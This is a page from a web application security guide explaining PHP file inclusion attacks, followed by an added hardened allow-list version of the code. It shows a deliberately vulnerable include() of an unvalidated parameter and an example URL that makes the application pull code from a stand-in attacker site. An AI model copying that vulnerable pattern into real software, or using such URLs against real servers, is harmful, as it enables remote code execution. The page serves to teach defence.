Web application security - the fast guide 1.1 | Page 142

Chapter 7 - Attack execution (3)

[Figure: a block of application code in which one line of malicious code has been inserted]

Attack process

In this type of attack the attacker focuses on code that dynamically loads or imports local or external code. The main idea is to manipulate the parameters so that the same code imports external malicious code. The following listing is the URL of an application that accepts a parameter, language, to load the related localization file:

https://myapplication.com/index.php?language=en

The page will import the localization file depending on the entered parameter:

$language = $_GET['language'];
include( $language . '.php' );

As can be noticed, there is no validation of the language parameter, which gives the attacker the ability to use any value for it; a malicious attack can be initiated with the following page call:

https://myapplication.com/index.php?language=http://attackersite.com/pageContainingMaliciousCode

Even if external files cannot be included, the ability to import any local file available on the server can represent a real issue, because it might help the attacker to access or compromise a restricted resource just by including it. Moreover, local inclusion can also be used to pull a library or functionality available in a local file into another file, which might give the attacker the ability to execute those functionalities in the context of the container file.
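As an added example (not code from the book), the same localization loader rewritten so that the parameter can only select from a fixed allow-list of language codes, and the resolved path is verified to lie inside the locale directory before it reaches include(); the directory layout and the set of language codes are assumptions:

```php
<?php
// Added example: hardened version of the book's localization include.
// The user-supplied value is never concatenated into a path; it only picks
// an entry from a fixed allow-list, so neither a remote URL nor a path to an
// arbitrary local file can be injected through ?language=...

const LOCALE_DIR = __DIR__ . '/locales';      // assumed layout: locales/en.php, locales/fr.php ...
const ALLOWED_LANGUAGES = ['en', 'fr', 'de']; // assumed set of shipped locale files
const DEFAULT_LANGUAGE = 'en';

// Map the raw parameter onto an allow-listed code, falling back to the default.
function resolveLanguage(?string $language): string
{
    if ($language === null || !in_array($language, ALLOWED_LANGUAGES, true)) {
        return DEFAULT_LANGUAGE;
    }
    return $language;
}

// Defence in depth: even with an allow-list, confirm the file really exists
// inside LOCALE_DIR before including it. realpath() resolves "..", symlinks
// and returns false for URLs, so anything outside the directory is rejected.
function localeFileFor(string $language): ?string
{
    $base = realpath(LOCALE_DIR);
    $real = realpath(LOCALE_DIR . '/' . $language . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved outside the locale directory
    }
    return $real;
}

function loadLocale(?string $requested): bool
{
    $file = localeFileFor(resolveLanguage($requested));
    if ($file === null) {
        return false; // log and serve the default strings instead
    }
    include $file;
    return true;
}

// Usage: loadLocale($_GET['language'] ?? null);
// In addition, keep allow_url_include=Off in php.ini so include() cannot
// fetch remote code even if a path check is bypassed elsewhere.
```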